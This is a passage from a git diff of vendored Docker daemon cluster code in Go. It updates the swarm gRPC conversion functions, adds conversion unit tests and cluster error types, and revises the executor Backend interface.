 func placementFromGRPC(p *swarmapi.Placement) *types.Placement {
-	var r *types.Placement
-	if p != nil {
-		r = &types.Placement{}
-		r.Constraints = p.Constraints
+	if p == nil {
+		return nil
+	}
+	r := &types.Placement{
+		Constraints: p.Constraints,
+	}
+
+	for _, pref := range p.Preferences {
+		if spread := pref.GetSpread(); spread != nil {
+			r.Preferences = append(r.Preferences, types.PlacementPreference{
+				Spread: &types.SpreadOver{
+					SpreadDescriptor: spread.SpreadDescriptor,
+				},
+			})
+		}
+	}
+
+	for _, plat := range p.Platforms {
+		r.Platforms = append(r.Platforms, types.Platform{
+			Architecture: plat.Architecture,
+			OS:           plat.OS,
+		})
 	}
 
 	return r
@@ -364,3 +515,125 @@ func driverToGRPC(p *types.Driver) *swarmapi.Driver {
 		Options: p.Options,
 	}
 }
+
+func updateConfigFromGRPC(updateConfig *swarmapi.UpdateConfig) *types.UpdateConfig {
+	if updateConfig == nil {
+		return nil
+	}
+
+	converted := &types.UpdateConfig{
+		Parallelism:     updateConfig.Parallelism,
+		MaxFailureRatio: updateConfig.MaxFailureRatio,
+	}
+
+	converted.Delay = updateConfig.Delay
+	if updateConfig.Monitor != nil {
+		converted.Monitor, _ = gogotypes.DurationFromProto(updateConfig.Monitor)
+	}
+
+	switch updateConfig.FailureAction {
+	case swarmapi.UpdateConfig_PAUSE:
+		converted.FailureAction = types.UpdateFailureActionPause
+	case swarmapi.UpdateConfig_CONTINUE:
+		converted.FailureAction = types.UpdateFailureActionContinue
+	case swarmapi.UpdateConfig_ROLLBACK:
+		converted.FailureAction = types.UpdateFailureActionRollback
+	}
+
+	switch updateConfig.Order {
+	case swarmapi.UpdateConfig_STOP_FIRST:
+		converted.Order = types.UpdateOrderStopFirst
+	case swarmapi.UpdateConfig_START_FIRST:
+		converted.Order = types.UpdateOrderStartFirst
+	}
+
+	return converted
+}
+
+func updateConfigToGRPC(updateConfig *types.UpdateConfig) (*swarmapi.UpdateConfig, error) {
+	if updateConfig == nil {
+		return nil, nil
+	}
+
+	converted := &swarmapi.UpdateConfig{
+		Parallelism:     updateConfig.Parallelism,
+		Delay:           updateConfig.Delay,
+		MaxFailureRatio: updateConfig.MaxFailureRatio,
+	}
+
+	switch updateConfig.FailureAction {
+	case types.UpdateFailureActionPause, "":
+		converted.FailureAction = swarmapi.UpdateConfig_PAUSE
+	case types.UpdateFailureActionContinue:
+		converted.FailureAction = swarmapi.UpdateConfig_CONTINUE
+	case types.UpdateFailureActionRollback:
+		converted.FailureAction = swarmapi.UpdateConfig_ROLLBACK
+	default:
+		return nil, fmt.Errorf("unrecognized update failure action %s", updateConfig.FailureAction)
+	}
+	if updateConfig.Monitor != 0 {
+		converted.Monitor = gogotypes.DurationProto(updateConfig.Monitor)
+	}
+
+	switch updateConfig.Order {
+	case types.UpdateOrderStopFirst, "":
+		converted.Order = swarmapi.UpdateConfig_STOP_FIRST
+	case types.UpdateOrderStartFirst:
+		converted.Order = swarmapi.UpdateConfig_START_FIRST
+	default:
+		return nil, fmt.Errorf("unrecognized update order %s", updateConfig.Order)
+	}
+
+	return converted, nil
+}
+
+func networkAttachmentSpecFromGRPC(attachment swarmapi.NetworkAttachmentSpec) *types.NetworkAttachmentSpec {
+	return &types.NetworkAttachmentSpec{
+		ContainerID: attachment.ContainerID,
+	}
+}
+
+func taskSpecFromGRPC(taskSpec swarmapi.TaskSpec) (types.TaskSpec, error) {
+	taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(taskSpec.Networks))
+	for _, n := range taskSpec.Networks {
+		netConfig := types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverOpts: n.DriverAttachmentOpts}
+		taskNetworks = append(taskNetworks, netConfig)
+	}
+
+	t := types.TaskSpec{
+		Resources:     resourcesFromGRPC(taskSpec.Resources),
+		RestartPolicy: restartPolicyFromGRPC(taskSpec.Restart),
+		Placement:     placementFromGRPC(taskSpec.Placement),
+		LogDriver:     driverFromGRPC(taskSpec.LogDriver),
+		Networks:      taskNetworks,
+		ForceUpdate:   taskSpec.ForceUpdate,
+	}
+
+	switch taskSpec.GetRuntime().(type) {
+	case *swarmapi.TaskSpec_Container, nil:
+		c := taskSpec.GetContainer()
+		if c != nil {
+			t.ContainerSpec = containerSpecFromGRPC(c)
+		}
+	case *swarmapi.TaskSpec_Generic:
+		g := taskSpec.GetGeneric()
+		if g != nil {
+			switch g.Kind {
+			case string(types.RuntimePlugin):
+				var p runtime.PluginSpec
+				if err := proto.Unmarshal(g.Payload.Value, &p); err != nil {
+					return t, errors.Wrap(err, "error unmarshalling plugin spec")
+				}
+				t.PluginSpec = &p
+			}
+		}
+	case *swarmapi.TaskSpec_Attachment:
+		a := taskSpec.GetAttachment()
+		if a != nil {
+			t.NetworkAttachmentSpec = networkAttachmentSpecFromGRPC(*a)
+		}
+		t.Runtime = types.RuntimeNetworkAttachment
+	}
+
+	return t, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go
new file mode 100644
index 0000000000..ad5f0d4494
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go
@@ -0,0 +1,308 @@
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
+
+import (
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/api/types/swarm/runtime"
+	swarmapi "github.com/docker/swarmkit/api"
+	google_protobuf3 "github.com/gogo/protobuf/types"
+	"gotest.tools/assert"
+)
+
+func TestServiceConvertFromGRPCRuntimeContainer(t *testing.T) {
+	gs := swarmapi.Service{
+		Meta: swarmapi.Meta{
+			Version: swarmapi.Version{
+				Index: 1,
+			},
+			CreatedAt: nil,
+			UpdatedAt: nil,
+		},
+		SpecVersion: &swarmapi.Version{
+			Index: 1,
+		},
+		Spec: swarmapi.ServiceSpec{
+			Task: swarmapi.TaskSpec{
+				Runtime: &swarmapi.TaskSpec_Container{
+					Container: &swarmapi.ContainerSpec{
+						Image: "alpine:latest",
+					},
+				},
+			},
+		},
+	}
+
+	svc, err := ServiceFromGRPC(gs)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if svc.Spec.TaskTemplate.Runtime != swarmtypes.RuntimeContainer {
+		t.Fatalf("expected type %s; received %T", swarmtypes.RuntimeContainer, svc.Spec.TaskTemplate.Runtime)
+	}
+}
+
+func TestServiceConvertFromGRPCGenericRuntimePlugin(t *testing.T) {
+	kind := string(swarmtypes.RuntimePlugin)
+	url := swarmtypes.RuntimeURLPlugin
+	gs := swarmapi.Service{
+		Meta: swarmapi.Meta{
+			Version: swarmapi.Version{
+				Index: 1,
+			},
+			CreatedAt: nil,
+			UpdatedAt: nil,
+		},
+		SpecVersion: &swarmapi.Version{
+			Index: 1,
+		},
+		Spec: swarmapi.ServiceSpec{
+			Task: swarmapi.TaskSpec{
+				Runtime: &swarmapi.TaskSpec_Generic{
+					Generic: &swarmapi.GenericRuntimeSpec{
+						Kind: kind,
+						Payload: &google_protobuf3.Any{
+							TypeUrl: string(url),
+						},
+					},
+				},
+			},
+		},
+	}
+
+	svc, err := ServiceFromGRPC(gs)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if svc.Spec.TaskTemplate.Runtime != swarmtypes.RuntimePlugin {
+		t.Fatalf("expected type %s; received %T", swarmtypes.RuntimePlugin, svc.Spec.TaskTemplate.Runtime)
+	}
+}
+
+func TestServiceConvertToGRPCGenericRuntimePlugin(t *testing.T) {
+	s := swarmtypes.ServiceSpec{
+		TaskTemplate: swarmtypes.TaskSpec{
+			Runtime:    swarmtypes.RuntimePlugin,
+			PluginSpec: &runtime.PluginSpec{},
+		},
+		Mode: swarmtypes.ServiceMode{
+			Global: &swarmtypes.GlobalService{},
+		},
+	}
+
+	svc, err := ServiceSpecToGRPC(s)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	v, ok := svc.Task.Runtime.(*swarmapi.TaskSpec_Generic)
+	if !ok {
+		t.Fatal("expected type swarmapi.TaskSpec_Generic")
+	}
+
+	if v.Generic.Payload.TypeUrl != string(swarmtypes.RuntimeURLPlugin) {
+		t.Fatalf("expected url %s; received %s", swarmtypes.RuntimeURLPlugin, v.Generic.Payload.TypeUrl)
+	}
+}
+
+func TestServiceConvertToGRPCContainerRuntime(t *testing.T) {
+	image := "alpine:latest"
+	s := swarmtypes.ServiceSpec{
+		TaskTemplate: swarmtypes.TaskSpec{
+			ContainerSpec: &swarmtypes.ContainerSpec{
+				Image: image,
+			},
+		},
+		Mode: swarmtypes.ServiceMode{
+			Global: &swarmtypes.GlobalService{},
+		},
+	}
+
+	svc, err := ServiceSpecToGRPC(s)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	v, ok := svc.Task.Runtime.(*swarmapi.TaskSpec_Container)
+	if !ok {
+		t.Fatal("expected type swarmapi.TaskSpec_Container")
+	}
+
+	if v.Container.Image != image {
+		t.Fatalf("expected image %s; received %s", image, v.Container.Image)
+	}
+}
+
+func TestServiceConvertToGRPCGenericRuntimeCustom(t *testing.T) {
+	s := swarmtypes.ServiceSpec{
+		TaskTemplate: swarmtypes.TaskSpec{
+			Runtime: "customruntime",
+		},
+		Mode: swarmtypes.ServiceMode{
+			Global: &swarmtypes.GlobalService{},
+		},
+	}
+
+	if _, err := ServiceSpecToGRPC(s); err != ErrUnsupportedRuntime {
+		t.Fatal(err)
+	}
+}
+
+func TestServiceConvertToGRPCIsolation(t *testing.T) {
+	cases := []struct {
+		name string
+		from containertypes.Isolation
+		to   swarmapi.ContainerSpec_Isolation
+	}{
+		{name: "empty", from: containertypes.IsolationEmpty, to: swarmapi.ContainerIsolationDefault},
+		{name: "default", from: containertypes.IsolationDefault, to: swarmapi.ContainerIsolationDefault},
+		{name: "process", from: containertypes.IsolationProcess, to: swarmapi.ContainerIsolationProcess},
+		{name: "hyperv", from: containertypes.IsolationHyperV, to: swarmapi.ContainerIsolationHyperV},
+		{name: "proCess", from: containertypes.Isolation("proCess"), to: swarmapi.ContainerIsolationProcess},
+		{name: "hypErv", from: containertypes.Isolation("hypErv"), to: swarmapi.ContainerIsolationHyperV},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			s := swarmtypes.ServiceSpec{
+				TaskTemplate: swarmtypes.TaskSpec{
+					ContainerSpec: &swarmtypes.ContainerSpec{
+						Image:     "alpine:latest",
+						Isolation: c.from,
+					},
+				},
+				Mode: swarmtypes.ServiceMode{
+					Global: &swarmtypes.GlobalService{},
+				},
+			}
+			res, err := ServiceSpecToGRPC(s)
+			assert.NilError(t, err)
+			v, ok := res.Task.Runtime.(*swarmapi.TaskSpec_Container)
+			if !ok {
+				t.Fatal("expected type swarmapi.TaskSpec_Container")
+			}
+			assert.Equal(t, c.to, v.Container.Isolation)
+		})
+	}
+}
+
+func TestServiceConvertFromGRPCIsolation(t *testing.T) {
+	cases := []struct {
+		name string
+		from swarmapi.ContainerSpec_Isolation
+		to   containertypes.Isolation
+	}{
+		{name: "default", to: containertypes.IsolationDefault, from: swarmapi.ContainerIsolationDefault},
+		{name: "process", to: containertypes.IsolationProcess, from: swarmapi.ContainerIsolationProcess},
+		{name: "hyperv", to: containertypes.IsolationHyperV, from: swarmapi.ContainerIsolationHyperV},
+	}
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			gs := swarmapi.Service{
+				Meta: swarmapi.Meta{
+					Version: swarmapi.Version{
+						Index: 1,
+					},
+					CreatedAt: nil,
+					UpdatedAt: nil,
+				},
+				SpecVersion: &swarmapi.Version{
+					Index: 1,
+				},
+				Spec: swarmapi.ServiceSpec{
+					Task: swarmapi.TaskSpec{
+						Runtime: &swarmapi.TaskSpec_Container{
+							Container: &swarmapi.ContainerSpec{
+								Image:     "alpine:latest",
+								Isolation: c.from,
+							},
+						},
+					},
+				},
+			}
+
+			svc, err := ServiceFromGRPC(gs)
+			if err != nil {
+				t.Fatal(err)
+			}
+
+			assert.Equal(t, c.to, svc.Spec.TaskTemplate.ContainerSpec.Isolation)
+		})
+	}
+}
+
+func TestServiceConvertToGRPCNetworkAtachmentRuntime(t *testing.T) {
+	someid := "asfjkl"
+	s := swarmtypes.ServiceSpec{
+		TaskTemplate: swarmtypes.TaskSpec{
+			Runtime: swarmtypes.RuntimeNetworkAttachment,
+			NetworkAttachmentSpec: &swarmtypes.NetworkAttachmentSpec{
+				ContainerID: someid,
+			},
+		},
+	}
+
+	// discard the service, which will be empty
+	_, err := ServiceSpecToGRPC(s)
+	if err == nil {
+		t.Fatalf("expected error %v but got no error", ErrUnsupportedRuntime)
+	}
+	if err != ErrUnsupportedRuntime {
+		t.Fatalf("expected error %v but got error %v", ErrUnsupportedRuntime, err)
+	}
+}
+
+func TestServiceConvertToGRPCMismatchedRuntime(t *testing.T) {
+	// NOTE(dperny): an earlier version of this test was for code that also
+	// converted network attachment tasks to GRPC. that conversion code was
+	// removed, so if this loop body seems a bit complicated, that's why.
+	for i, rt := range []swarmtypes.RuntimeType{
+		swarmtypes.RuntimeContainer,
+		swarmtypes.RuntimePlugin,
+	} {
+		for j, spec := range []swarmtypes.TaskSpec{
+			{ContainerSpec: &swarmtypes.ContainerSpec{}},
+			{PluginSpec: &runtime.PluginSpec{}},
+		} {
+			// skip the cases, where the indices match, which would not error
+			if i == j {
+				continue
+			}
+			// set the task spec, then change the runtime
+			s := swarmtypes.ServiceSpec{
+				TaskTemplate: spec,
+			}
+			s.TaskTemplate.Runtime = rt
+
+			if _, err := ServiceSpecToGRPC(s); err != ErrMismatchedRuntime {
+				t.Fatalf("expected %v got %v", ErrMismatchedRuntime, err)
+			}
+		}
+	}
+}
+
+func TestTaskConvertFromGRPCNetworkAttachment(t *testing.T) {
+	containerID := "asdfjkl"
+	s := swarmapi.TaskSpec{
+		Runtime: &swarmapi.TaskSpec_Attachment{
+			Attachment: &swarmapi.NetworkAttachmentSpec{
+				ContainerID: containerID,
+			},
+		},
+	}
+	ts, err := taskSpecFromGRPC(s)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if ts.NetworkAttachmentSpec == nil {
+		t.Fatal("expected task spec to have network attachment spec")
+	}
+	if ts.NetworkAttachmentSpec.ContainerID != containerID {
+		t.Fatalf("expected network attachment spec container id to be %q, was %q", containerID, ts.NetworkAttachmentSpec.ContainerID)
+	}
+	if ts.Runtime != swarmtypes.RuntimeNetworkAttachment {
+		t.Fatalf("expected Runtime to be %v", swarmtypes.RuntimeNetworkAttachment)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go
index 606e00a69b..ae97a4b61d 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go
@@ -1,13 +1,13 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
 	"fmt"
 	"strings"
-	"time"
 
 	types "github.com/docker/docker/api/types/swarm"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	"github.com/docker/swarmkit/ca"
+	gogotypes "github.com/gogo/protobuf/types"
 )
 
 // SwarmFromGRPC converts a grpc Cluster to a Swarm.
@@ -29,7 +29,17 @@ func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm {
 				EncryptionConfig: types.EncryptionConfig{
 					AutoLockManagers: c.Spec.EncryptionConfig.AutoLockManagers,
 				},
+				CAConfig: types.CAConfig{
+					// do not include the signing CA cert or key (it should already be redacted via the swarm APIs) -
+					// the key because it's secret, and the cert because otherwise doing a get + update on the spec
+					// can cause issues because the key would be missing and the cert wouldn't
+					ForceRotate: c.Spec.CAConfig.ForceRotate,
+				},
+			},
+			TLSInfo: types.TLSInfo{
+				TrustRoot: string(c.RootCA.CACert),
 			},
+			RootRotationInProgress: c.RootCA.RootRotation != nil,
 		},
 		JoinTokens: types.JoinTokens{
 			Worker:  c.RootCA.JoinTokens.Worker,
@@ -37,27 +47,33 @@ func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm {
 		},
 	}
 
-	heartbeatPeriod, _ := ptypes.Duration(c.Spec.Dispatcher.HeartbeatPeriod)
+	issuerInfo, err := ca.IssuerFromAPIRootCA(&c.RootCA)
+	if err == nil && issuerInfo != nil {
+		swarm.TLSInfo.CertIssuerSubject = issuerInfo.Subject
+		swarm.TLSInfo.CertIssuerPublicKey = issuerInfo.PublicKey
+	}
+
+	heartbeatPeriod, _ := gogotypes.DurationFromProto(c.Spec.Dispatcher.HeartbeatPeriod)
 	swarm.Spec.Dispatcher.HeartbeatPeriod = heartbeatPeriod
 
-	swarm.Spec.CAConfig.NodeCertExpiry, _ = ptypes.Duration(c.Spec.CAConfig.NodeCertExpiry)
+	swarm.Spec.CAConfig.NodeCertExpiry, _ = gogotypes.DurationFromProto(c.Spec.CAConfig.NodeCertExpiry)
 
 	for _, ca := range c.Spec.CAConfig.ExternalCAs {
 		swarm.Spec.CAConfig.ExternalCAs = append(swarm.Spec.CAConfig.ExternalCAs, &types.ExternalCA{
 			Protocol: types.ExternalCAProtocol(strings.ToLower(ca.Protocol.String())),
 			URL:      ca.URL,
 			Options:  ca.Options,
+			CACert:   string(ca.CACert),
 		})
 	}
 
 	// Meta
 	swarm.Version.Index = c.Meta.Version.Index
-	swarm.CreatedAt, _ = ptypes.Timestamp(c.Meta.CreatedAt)
-	swarm.UpdatedAt, _ = ptypes.Timestamp(c.Meta.UpdatedAt)
+	swarm.CreatedAt, _ = gogotypes.TimestampFromProto(c.Meta.CreatedAt)
+	swarm.UpdatedAt, _ = gogotypes.TimestampFromProto(c.Meta.UpdatedAt)
 
 	// Annotations
-	swarm.Spec.Name = c.Spec.Annotations.Name
-	swarm.Spec.Labels = c.Spec.Annotations.Labels
+	swarm.Spec.Annotations = annotationsFromGRPC(c.Spec.Annotations)
 
 	return swarm
 }
@@ -98,11 +114,19 @@ func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.Clu
 		spec.Raft.ElectionTick = uint32(s.Raft.ElectionTick)
 	}
 	if s.Dispatcher.HeartbeatPeriod != 0 {
-		spec.Dispatcher.HeartbeatPeriod = ptypes.DurationProto(time.Duration(s.Dispatcher.HeartbeatPeriod))
+		spec.Dispatcher.HeartbeatPeriod = gogotypes.DurationProto(s.Dispatcher.HeartbeatPeriod)
 	}
 	if s.CAConfig.NodeCertExpiry != 0 {
-		spec.CAConfig.NodeCertExpiry = ptypes.DurationProto(s.CAConfig.NodeCertExpiry)
+		spec.CAConfig.NodeCertExpiry = gogotypes.DurationProto(s.CAConfig.NodeCertExpiry)
+	}
+	if s.CAConfig.SigningCACert != "" {
+		spec.CAConfig.SigningCACert = []byte(s.CAConfig.SigningCACert)
+	}
+	if s.CAConfig.SigningCAKey != "" {
+		// do propagate the signing CA key here because we want to provide it TO the swarm APIs
+		spec.CAConfig.SigningCAKey = []byte(s.CAConfig.SigningCAKey)
 	}
+	spec.CAConfig.ForceRotate = s.CAConfig.ForceRotate
 
 	for _, ca := range s.CAConfig.ExternalCAs {
 		protocol, ok := swarmapi.ExternalCA_CAProtocol_value[strings.ToUpper(string(ca.Protocol))]
@@ -113,6 +137,7 @@ func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.Clu
 			Protocol: swarmapi.ExternalCA_CAProtocol(protocol),
 			URL:      ca.URL,
 			Options:  ca.Options,
+			CACert:   []byte(ca.CACert),
 		})
 	}
 
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go
index d0cf89c288..72e2805e1e 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go
@@ -1,70 +1,58 @@
-package convert
+package convert // import "github.com/docker/docker/daemon/cluster/convert"
 
 import (
 	"strings"
 
 	types "github.com/docker/docker/api/types/swarm"
 	swarmapi "github.com/docker/swarmkit/api"
-	"github.com/docker/swarmkit/protobuf/ptypes"
+	gogotypes "github.com/gogo/protobuf/types"
 )
 
 // TaskFromGRPC converts a grpc Task to a Task.
-func TaskFromGRPC(t swarmapi.Task) types.Task {
-	if t.Spec.GetAttachment() != nil {
-		return types.Task{}
-	}
-	containerConfig := t.Spec.Runtime.(*swarmapi.TaskSpec_Container).Container
+func TaskFromGRPC(t swarmapi.Task) (types.Task, error) {
 	containerStatus := t.Status.GetContainer()
-	networks := make([]types.NetworkAttachmentConfig, 0, len(t.Spec.Networks))
-	for _, n := range t.Spec.Networks {
-		networks = append(networks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	taskSpec, err := taskSpecFromGRPC(t.Spec)
+	if err != nil {
+		return types.Task{}, err
 	}
-
 	task := types.Task{
-		ID: t.ID,
-		Annotations: types.Annotations{
-			Name:   t.Annotations.Name,
-			Labels: t.Annotations.Labels,
-		},
-		ServiceID: t.ServiceID,
-		Slot:      int(t.Slot),
-		NodeID:    t.NodeID,
-		Spec: types.TaskSpec{
-			ContainerSpec: containerSpecFromGRPC(containerConfig),
-			Resources:     resourcesFromGRPC(t.Spec.Resources),
-			RestartPolicy: restartPolicyFromGRPC(t.Spec.Restart),
-			Placement:     placementFromGRPC(t.Spec.Placement),
-			LogDriver:     driverFromGRPC(t.Spec.LogDriver),
-			Networks:      networks,
-		},
+		ID:          t.ID,
+		Annotations: annotationsFromGRPC(t.Annotations),
+		ServiceID:   t.ServiceID,
+		Slot:        int(t.Slot),
+		NodeID:      t.NodeID,
+		Spec:        taskSpec,
 		Status: types.TaskStatus{
 			State:   types.TaskState(strings.ToLower(t.Status.State.String())),
 			Message: t.Status.Message,
 			Err:     t.Status.Err,
 		},
-		DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())),
+		DesiredState:     types.TaskState(strings.ToLower(t.DesiredState.String())),
+		GenericResources: GenericResourcesFromGRPC(t.AssignedGenericResources),
 	}
 
 	// Meta
 	task.Version.Index = t.Meta.Version.Index
-	task.CreatedAt, _ = ptypes.Timestamp(t.Meta.CreatedAt)
-	task.UpdatedAt, _ = ptypes.Timestamp(t.Meta.UpdatedAt)
+	task.CreatedAt, _ = gogotypes.TimestampFromProto(t.Meta.CreatedAt)
+	task.UpdatedAt, _ = gogotypes.TimestampFromProto(t.Meta.UpdatedAt)
 
-	task.Status.Timestamp, _ = ptypes.Timestamp(t.Status.Timestamp)
+	task.Status.Timestamp, _ = gogotypes.TimestampFromProto(t.Status.Timestamp)
 
 	if containerStatus != nil {
-		task.Status.ContainerStatus.ContainerID = containerStatus.ContainerID
-		task.Status.ContainerStatus.PID = int(containerStatus.PID)
-		task.Status.ContainerStatus.ExitCode = int(containerStatus.ExitCode)
+		task.Status.ContainerStatus = &types.ContainerStatus{
+			ContainerID: containerStatus.ContainerID,
+			PID:         int(containerStatus.PID),
+			ExitCode:    int(containerStatus.ExitCode),
+		}
 	}
 
 	// NetworksAttachments
 	for _, na := range t.Networks {
-		task.NetworksAttachments = append(task.NetworksAttachments, networkAttachementFromGRPC(na))
+		task.NetworksAttachments = append(task.NetworksAttachments, networkAttachmentFromGRPC(na))
 	}
 
 	if t.Status.PortStatus == nil {
-		return task
+		return task, nil
 	}
 
 	for _, p := range t.Status.PortStatus.Ports {
@@ -77,5 +65,5 @@ func TaskFromGRPC(t swarmapi.Task) types.Task {
 		})
 	}
 
-	return task
+	return task, nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/errors.go b/vendor/github.com/docker/docker/daemon/cluster/errors.go
new file mode 100644
index 0000000000..9ec716b1ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/errors.go
@@ -0,0 +1,61 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+const (
+	// errNoSwarm is returned on leaving a cluster that was never initialized
+	errNoSwarm notAvailableError = "This node is not part of a swarm"
+
+	// errSwarmExists is returned on initialize or join request for a cluster that has already been activated
+	errSwarmExists notAvailableError = "This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one."
+
+	// errSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached.
+	errSwarmJoinTimeoutReached notAvailableError = "Timeout was reached before node joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node."
+
+	// errSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it.
+	errSwarmLocked notAvailableError = "Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it."
+
+	// errSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically.
+	errSwarmCertificatesExpired notAvailableError = "Swarm certificates have expired. To replace them, leave the swarm and join again."
+
+	// errSwarmNotManager is returned if the node is not a swarm manager.
+	errSwarmNotManager notAvailableError = "This node is not a swarm manager. Worker nodes can't be used to view or modify cluster state. Please run this command on a manager node or promote the current node to a manager."
+)
+
+type notAllowedError string
+
+func (e notAllowedError) Error() string {
+	return string(e)
+}
+
+func (e notAllowedError) Forbidden() {}
+
+type notAvailableError string
+
+func (e notAvailableError) Error() string {
+	return string(e)
+}
+
+func (e notAvailableError) Unavailable() {}
+
+type configError string
+
+func (e configError) Error() string {
+	return string(e)
+}
+
+func (e configError) InvalidParameter() {}
+
+type invalidUnlockKey struct{}
+
+func (invalidUnlockKey) Error() string {
+	return "swarm could not be unlocked: invalid key provided"
+}
+
+func (invalidUnlockKey) Unauthorized() {}
+
+type notLockedError struct{}
+
+func (notLockedError) Error() string {
+	return "swarm is not locked"
+}
+
+func (notLockedError) Conflict() {}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go
index 0f1da38558..1f2312ab40 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go
@@ -1,10 +1,12 @@
-package executor
+package executor // import "github.com/docker/docker/daemon/cluster/executor"
 
 import (
+	"context"
 	"io"
 	"time"
 
 	"github.com/docker/distribution"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
@@ -12,39 +14,40 @@ import (
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/network"
 	swarmtypes "github.com/docker/docker/api/types/swarm"
+	containerpkg "github.com/docker/docker/container"
 	clustertypes "github.com/docker/docker/daemon/cluster/provider"
+	networkSettings "github.com/docker/docker/daemon/network"
 	"github.com/docker/docker/plugin"
-	"github.com/docker/docker/reference"
+	volumeopts "github.com/docker/docker/volume/service/opts"
 	"github.com/docker/libnetwork"
 	"github.com/docker/libnetwork/cluster"
 	networktypes "github.com/docker/libnetwork/types"
 	"github.com/docker/swarmkit/agent/exec"
-	"golang.org/x/net/context"
 )
 
 // Backend defines the executor component for a swarm agent.
 type Backend interface {
 	CreateManagedNetwork(clustertypes.NetworkCreateRequest) error
-	DeleteManagedNetwork(name string) error
+	DeleteManagedNetwork(networkID string) error
 	FindNetwork(idName string) (libnetwork.Network, error)
-	SetupIngress(req clustertypes.NetworkCreateRequest, nodeIP string) error
-	PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error
+	SetupIngress(clustertypes.NetworkCreateRequest, string) (<-chan struct{}, error)
+	ReleaseIngress() (<-chan struct{}, error)
 	CreateManagedContainer(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error)
 	ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error
 	ContainerStop(name string, seconds *int) error
-	ContainerLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error
+	ContainerLogs(context.Context, string, *types.ContainerLogsOptions) (msgs <-chan *backend.LogMessage, tty bool, err error)
 	ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error
 	ActivateContainerServiceBinding(containerName string) error
 	DeactivateContainerServiceBinding(containerName string) error
 	UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error
 	ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error)
-	ContainerWaitWithContext(ctx context.Context, name string) error
+	ContainerWait(ctx context.Context, name string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error)
 	ContainerRm(name string, config *types.ContainerRmConfig) error
 	ContainerKill(name string, sig uint64) error
-	SetContainerSecretStore(name string, store exec.SecretGetter) error
+	SetContainerDependencyStore(name string, store exec.DependencyGetter) error
 	SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error
+	SetContainerConfigReferences(name string, refs []*swarmtypes.ConfigReference) error
 	SystemInfo() (*types.Info, error)
-	VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error)
 	Containers(config *types.ContainerListOptions) ([]*types.Container, error)
 	SetNetworkBootstrapKeys([]*networktypes.EncryptionKey) error
 	DaemonJoinsCluster(provider cluster.Provider)
@@ -54,8 +57,19 @@ type Backend interface {
 	UnsubscribeFromEvents(listener chan interface{})
 	UpdateAttachment(string, string, string, *network.NetworkingConfig) error
 	WaitForDetachment(context.Context, string, string, string, string) error
-	GetRepository(context.Context, reference.NamedTagged, *types.AuthConfig) (distribution.Repository, bool, error)
-	LookupImage(name string) (*types.ImageInspect, error)
 	PluginManager() *plugin.Manager
 	PluginGetter() *plugin.Store
+	GetAttachmentStore() *networkSettings.AttachmentStore
+}
+
+// VolumeBackend is used by an executor to perform volume operations
+type VolumeBackend interface {
